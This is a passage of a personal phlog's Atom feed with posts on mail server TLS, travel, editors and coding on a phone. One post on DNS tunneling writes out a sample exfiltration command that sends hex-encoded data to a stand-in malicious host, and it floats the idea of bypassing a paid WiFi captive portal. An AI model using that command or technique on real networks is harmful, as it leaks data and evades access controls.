Using floodgap's gateway is not really an option for me, as it lacks
UTF-8 support. That's per RFC 1436, but I believe that gopher content
is better served as UTF-8 than US-ASCII.
--
~wgs

[0]: gopher://z3bra.org/scm/phroxy
[1]: https://proxy.vulpes.one
20200913.1647]]></content>

              </entry>
<entry>

              <title><![CDATA[TLS-sending guarantee @posteo.de]]></title>

              <id>gopher://phlog.z3bra.org/0/tls-sending-guarantee-posteo.de.txt</id>

              <link href="gopher://phlog.z3bra.org/0/tls-sending-guarantee-posteo.de.txt" />

              <updated>2020-10-20T20:31:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                     TLS-sending guarantee @posteo.de
──────────────────────────────────────────────────────────────────────
Today, an internet fellow reported to me a strange issue he had when
sending me emails from his @posteo.de address. The mail bounced with
the following error:

“ TLS is required, but was not offered by host „

What ? I run opensmtpd, whose configuration includes the following
line:

    listen on egress tls pki lucy.z3bra.org

This makes the server listen on port 25, and accept upgrading the
connection to TLS via the STARTTLS command. A quick telnet session
demonstrates that it works as expected:

    220 lucy.z3bra.org ESMTP OpenSMTPD
    HELO sweetie
    250 lucy.z3bra.org Hello sweetie [redacted], pleased to meet you
    STARTTLS
    220 2.0.0 Ready to start TLS

So what is posteo really complaining about ?

After searching a bit, I found that they have an option called «
TLS-sending guarantee » (off by default). See their article on
TLS-sending guarantee for further details [0]:

“ As standard, before sending each email, Posteo attempts to create
an encrypted connection with other email servers. If the TLS-sending
guarantee is activated for your account, we will only send your email
if it can be securely delivered to the recipient. „

My guess is that TLS support is checked by connecting to port 465
first, the host being considered « unsafe » if the connection is
refused. Checking STARTTLS instead would probably be more costly in
terms of resources, because it means upgrading an already established
connection.

Of course, opensmtpd supports that, and the configuration was
*extremely* easy:

    listen on egress smtps pki lucy.z3bra.org
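
Both modes are easy to verify from the outside with openssl(1); these
commands are just a sanity check, not part of the setup:

    openssl s_client -connect lucy.z3bra.org:465
    openssl s_client -starttls smtp -connect lucy.z3bra.org:25

The first opens an implicit TLS session (smtps), the second upgrades a
plain session via STARTTLS; both should print the certificate chain.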

You learn something new every day !
--
~wgs

[0]: https://posteo.de/en/help/activating-tls-sending-guarantee

20201020.2031]]></content>

              </entry>
<entry>

              <title><![CDATA[Trip to Reunion Island]]></title>

              <id>gopher://phlog.z3bra.org/0/trip-to-reunion-island.txt</id>

              <link href="gopher://phlog.z3bra.org/0/trip-to-reunion-island.txt" />

              <updated>2020-10-14T19:34:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                               Trip to Reunion Island
──────────────────────────────────────────────────────────────────────

Reunion Island is a marvelous place, full of magnificent mountains,
wonderful lagoons and delightful people.

We went there with my girlfriend for the past two weeks, hiking and
diving all around the island. It is a volcanic island whose volcano is
one of the most active on earth.

# Salazie caldeira

This is the first caldeira we went to, directly after landing, and we
visited the nice little village of Hell-bourg. The next day we went to
the « Trou de fer » through the Bélouve forest. The viewpoint there is
impressive !

# Mafate caldeira

The next day, we went to Marla, a village in the Mafate caldeira. We
walked there because this caldeira is only accessible by foot, or
helicopter. The hike is beautiful; however we had fog during the
morning so we couldn't see much of the panorama. Marla is pretty
small, and most people living there are renting rooms to hikers. There
is a school however (with 10 kids !), and a snack bar, « chez Jimmy »,
which sells ti punches to everyone passing by !

# East coast, or « windy coast »

There is not much to see here in my opinion, besides the vanilla
cooperative. There is way more to see in the south !

# South - The lava road

The main thing to see in the south is of course the lava road, which
crosses the old lava flows that reach the ocean. Their size is
impressive, and all those rocky lava floors make for a desolate view.

# South - Everything else

This region is beautiful. The weather is much nicer, and there are a
lot of "lava beaches" and other funny stuff to see. There are also
many waterfalls caused by erosion.

# West coast, the lagoons

The lagoons are the only safe places for a bath in the ocean, because
of the shark presence around the island. There is a natural coral
barrier, which makes the lagoon a safe place for snorkeling. You
really get to see fish of various sizes, shapes and colours. It was
incredible to see that many fish !

# Cilaos caldeira

I got to experience alpinism for the very first time, and it was
incredible ! We climbed the famous « 3 Salazes », right between the
Mafate and Cilaos caldeiras. The view was beautiful on both sides, and
impressive too, as sometimes I was walking on trails barely 20cm wide !

Other than that, Cilaos is the third caldeira of the island, and it is
known for its lentils, so we definitely had to eat some !

# Last word

Reunion Island is a really nice place. I loved how you can switch from
the mountains to the lagoon in less than an hour. The food was also
pretty good (especially the « Rougail saucisse » !). I hope I'll get
to go back there someday !!

Oh and btw, here is a quick montage of a few pics I took there:

gopher://z3bra.org/I/u/reunion-2020.png

--
~wgs
20201014.1934]]></content>

              </entry>
<entry>

              <title><![CDATA[Using DNS to bypass hotspot WiFi]]></title>

              <id>gopher://phlog.z3bra.org/0/using-dns-to-bypass-hotspot-wifi.txt</id>

              <link href="gopher://phlog.z3bra.org/0/using-dns-to-bypass-hotspot-wifi.txt" />

              <updated>2020-09-26T13:42:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                     Using DNS to bypass hotspot WiFi
──────────────────────────────────────────────────────────────────────

I took the plane yesterday, and realized that some companies now «
offer » a free wifi service on-board, so you can access the internet
while flying. They don't really offer anything though, as you must
register your email address on a captive portal, and even pay a fee to
get full internet access (instead of just « messaging apps »).

I tried to access the internet using curl(1) directly, to see if you
could use protocols like gopher, or even smtp without registering.
Turns out you can't.
However, I noticed that I could resolve all the hostnames I wanted !
Which means DNS requests reach the internet without you needing to
register on the portal. It immediately reminded me of a technique I
read about in the past, and forgot: DNS tunneling.

DNS tunneling is usually used as a data exfiltration method in cyber
attacks. It assumes DNS traffic goes to the internet unfiltered, so a
malware can use DNS queries to export data to an external server. For
example:

   # hex-encode so the payload only contains valid hostname characters
   pl=$(echo "hidden data" | od -An -tx1 | tr -d ' \n')
   dig +short TXT "$pl.gimmedata.malicious.tld" @ns1.malicious.tld

The data can then be retrieved from the logs, or a modified DNS server
could even reconstruct it. This is bad though, and you shouldn't do it.

However, abusing the DNS payload to send data over the internet is an
interesting idea. Instead of exfiltrating data, you could use the
remote DNS server as a proxy or VPN, and access the clearnet by
wrapping all your outgoing traffic in DNS queries, which would be
replayed by the external server, and answered via DNS replies !

It could work in theory, but has two major downsides: first, it would
be horribly slow. The DNS payload is limited to something like 512
bytes, so that means fragmenting your traffic so it fits in a DNS
request. Same for replies.
The second drawback is that it generates a lot of DNS traffic,
potentially marking you as an attacker in the network you're trying to
bypass, which could lead to problems.

I thought it was a fun idea to explore, and I wonder if such a
proxying method has been tested already ?

Having such a DNS web proxy in your toolbox could be pretty helpful
from time to time !
--
~wgs
20200926.1342]]></content>

              </entry>
<entry>

              <title><![CDATA[Vis: Vim Improved, on Steroids]]></title>

              <id>gopher://phlog.z3bra.org/0/vis-vim-improved-on-steroids.txt</id>

              <link href="gopher://phlog.z3bra.org/0/vis-vim-improved-on-steroids.txt" />

              <updated>2023-07-07T01:15:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                       Vis: Vim Improved, on Steroids
──────────────────────────────────────────────────────────────────────

Ok, it's clickbait. But hey, you might as well keep reading now!

I've been using vis[0] as my main editor for a few years now, and
decided to make this post to bring attention onto it.
But first, let's have some context.

Vim
===

I've been using Vim for a very long time (since prior to May 2013,
according to git). During this time, I went through most of the phases
of a good Vim fanboy:

- ^C^C^C^Cquit^Mend^Mexit^M*reboot*
- Using normal mode just for HJKL
- Use HJKL in Every. Single. Application.
- Join the crusades against Emacs
- Changing my .vimrc every 5 seconds
- Read the Arabesque blog[1] a 1000 times
- Have 34792492 plugins, with 5 different plugin managers
- Have 0 plugin because THIS IS TRUE VIM
- rm ~/.vimrc because THIS IS TRUE VIM
- Play vimgolf all day
- …

But after some time of being a happy little Vim user, I fell into the
Plan9 trap.

Acme, Sam, Wily!

Three editors centered around the mouse, arriving just as I had
convinced myself that I didn't need a mouse, and that keyboard-centric
interfaces were the future. Then a cute little thing named Glenda[2]
brought me down her rabbit hole...

I had used Vim for so long at this point that I didn't see myself
changing editors, but it still got me curious: what is so powerful
about these editors, that so many people praise them ?

I've read many papers and blogs, and watched videos to learn about
Acme and Sam and their strengths. That's where I learnt about Sam's
Structural Regular Expressions:

https://doc.cat-v.org/bell_labs/structural_regexps/se.pdf

I kept reading about Sam, and it made me realize Vim's greatest
weakness:

It deals with lines of text.

This does not seem like a big deal, but it makes a huge difference!
Imagine the following code:

       int foo = 0;
       foo = random() % 16;
       if (foo > 7) {
               foo = do_stuff(foo)
       }
       return foo;

Now assume we want to change a few things:

0. rename "foo" to "bar"
1. remove the useless "= 0"
2. add the missing ; on line 4

How would we do these with Vim commands ?

0. :%s/foo/bar/g
1. :1s/ = 0// (or "ggt=dt;")
2. :4s/$/;/ (or "4GA;<ESC>")

Do you notice the pattern ? Even though Vim has :change, :delete and
:append/:insert commands, we used :substitute for all of them!  Think
about it the next time you use Vim. The substitute command is used 90%
of the time when using commands.

Here's how you'd do it with Sam now:

0. x/foo/ c/bar/
1. 1x/ = 0/ d
2. 4x/$/ a/;/

The x command eXtracts the selected text and runs a command on it, for
each selection separately. This is a very powerful concept, as it lets
you manipulate the text as a whole, rather than only interacting with
it one line at a time. The sam language has even more powerful features
which are described in its tutorial:

http://doc.cat-v.org/bell_labs/sam_lang_tutorial/sam_tut.pdf
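
The tutorial's classic example gives a taste of how these pieces
compose: renaming a variable n to num without touching identifiers
that merely contain an n (from memory, so double-check it against the
paper):

	x/[a-zA-Z_][a-zA-Z_0-9]*/ g/n/ v/../ c/num/

Read it aloud: extract every identifier, keep those containing an n,
reject those longer than one character, and change what remains to
num.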

Unfortunately for me, even though Sam has a very powerful command
language, navigating the file is done exclusively with the mouse. And
I just could not give up on the muscle memory I built over all these
years of using Vim.


So what were my options ? Going back to Vim, after seeing the greener
side of the grass ? Giving up on Vim, and the power of modal editing ?

Vis
===

There was a third option of course: Vis !

When I first found out about it, vis was a small project seeking to
provide "90% of the features of Vim, in 10% of the code". This was
immediately appealing to me, and I tried it right away. It had rough
edges, and I missed a few features, but it was clean and fast.

Then the project became more mature, and a new feature appeared: the
Sam command language was implemented in it. I was thrilled!

Vis combines the strengths of both Vim and Sam into what I believe is
the ultimate text editor. Selections (or DOT) benefit from Vim's
"visual" mode, allowing one to edit different portions of the file at
the same time, with multiple cursors.

And to put the icing on the cake, you can write plugins for it using
Lua.

Whether you're a plan9 fan looking for a good Sam implementation, or
an avid Vim user, I urge you to try it, and embrace the other side of
text editing.

Acme
====

Of course, I could not end this post without talking about Acme[3],
which I believe is the next step in editing evolution. I'm however too
scared to really commit to it, and buy a 3-button mouse for this sole
purpose (but I know I will, someday).

However, there is a middle ground: Edit[4]! This project has not been
updated in a long time, but it looks like a marvelous concept that I
would like to explore in the future.

Maybe the next (last?) step is Vim + Sam + Acme ?
--
~wgs

[0]: https://github.com/martanne/vis
[1]: https://blog.sanctum.geek.nz/category/vim
[2]: http://glenda.cat-v.org
[3]: http://acme.cat-v.org
[4]: https://c9x.me/edit

20230707.0115]]></content>

              </entry>
<entry>

              <title><![CDATA[Write code on a phone]]></title>

              <id>gopher://phlog.z3bra.org/0/write-code-on-a-phone.txt</id>

              <link href="gopher://phlog.z3bra.org/0/write-code-on-a-phone.txt" />

              <updated>2020-09-14T16:11:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                                Write code on a phone
──────────────────────────────────────────────────────────────────────

I recently injured my wrist. Not sure if it's because of my recent
intensive climbing sessions, or coding sessions, but it sure hurts a
lot to type on a keyboard now !

I have a bunch of cool projects going on though, so I had to find a way
to keep coding without adding more tension to my wrist. And I found a
« solution » :

My phone.

In portrait mode, the keyboard is small enough that I don't have to
move my thumbs much, so my wrist stays cool about it. And as I run a
full Linux (SailfishOS [0]), I benefit from all the bells and whistles
you get on linux, like vi, git, make, ssh, rsync, ...

The default terminal, however, is a piece of shit when it comes to
curses interfaces, because it uses a drop-down screen over the
keyboard. So when you type, the screen moves up to show the keyboard,
and you can't see the top of the window anymore, which is usually
where your cursor is in the vi editor.

Here too, I found a « solution » : ed(1).

And to be honest, now that I've got used to it, I prefer doing
line-based editing on the phone rather than using a full-screen
editor. Space is scarce on-screen, and I usually edit stuff over 3G
links, so ed(1) performs better in both cases !
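
For the curious, here is how small an ed(1) session can be. The file
name and the edit itself are of course just an example:

```shell
# Drive ed(1) non-interactively: it reads commands from stdin, so a
# whole edit costs a handful of bytes (nice over a 3G link).
# -s suppresses the byte-count chatter.
printf 'I like vi\n' > note.txt
printf '%s\n' 's/vi/ed/' w q | ed -s note.txt
cat note.txt
```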

So here I am:
- Injured.
- Coding on a phone.
- Using ed(1).

I feel like a sadomasochist. Except the goal is to feel LESS pain.

There is one /real/ benefit to coding on your phone though. When you
take a shit and find a solution to your problem, you can try it right
away ! 😉
--
~wgs

[0]: https://sailfishos.org

20200914.1611]]></content>

              </entry>
</feed>